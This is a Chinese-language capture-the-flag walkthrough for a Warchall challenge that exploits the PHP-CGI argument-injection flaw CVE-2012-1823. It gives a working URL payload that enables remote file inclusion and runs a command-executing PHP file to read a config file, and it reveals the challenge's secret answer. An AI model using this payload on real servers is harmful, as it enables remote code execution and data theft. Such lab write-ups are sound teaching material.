Warchall: Live RCE

具體漏洞是：CVE-2012-1823（PHP-CGI RCE）

在地址後面加進參數運行對應的php-cgi 參數的行爲

例如 index.php?-s

相參於/usr/bin/php53-cgi/php-cgi -f index.php -s

php-cgi --help以下：

Usage: php-cgi [-q] [-h] [-s] [-v] [-i] [-f <file>]
       php-cgi <file> [args...]
  -a               Run interactively
  -b <address:port>|<port> Bind Path for external FASTCGI Server mode
  -C               Do not chdir to the script's directory
  -c <path>|<file> Look for php.ini file in this directory
  -n               No php.ini file will be used
  -d foo[=bar]     Define INI entry foo with value 'bar'
  -e               Generate extended information for debugger/profiler
  -f <file>        Parse <file>.  Implies `-q'
  -h               This help
  -i               PHP information
  -l               Syntax check only (lint)
  -m               Show compiled in modules
  -q               Quiet-mode.  Suppress HTTP Header output.
  -s               Display colour syntax highlighted source.
  -v               Version number
  -w               Display source with stripped comments and whitespace.
  -z <file>        Load Zend extension <file>.
  -T <count>       Measure execution time of script repeated <count> times.

http://rce.warchall.net/?-s

看到index.php的源代碼

基中有一個語句是：require '../config.php';

而後咱們想辦法讀到這個文件

 

index.php 的絕對路徑是：/home/level/20_live_rce/www/index.php
../config.php 的絕對路徑是：/home/level/20_live_rce/config.ph
想辦法輸出config.php 的源代碼。

php-cgi
參數中：d foo[=bar]     Define INI entry foo with value 'bar'
-dallow_url_include=On
dauto_prepend_file=/tmp/2.php
在/tmp裏創建一個2.php內容是：

<?php
exec("cat /home/level/20_live_rce/config.php",$out);
print_r($out);
?>

 

提交地址：（地址裏，這個/tmp/2 能夠換在本身的服務 http://xxx.xxx/1.txt）

http://rce.warchall.net/?-dallow_url_include=On+-dauto_prepend_file=/tmp/2.php+-n

URLencode一下是：

http://rce.warchall.net/?-dallow_url_include%3DOn+-dauto_prepend_file%3D%2ftmp%2f2.php+-n

獲得 ../config.php的源代碼：

Array ( [0] => define('ICANHAZRCE', 'StrongGard_6_3'); 
[2] => return ICANHAZRCE; 
[3] => ?> )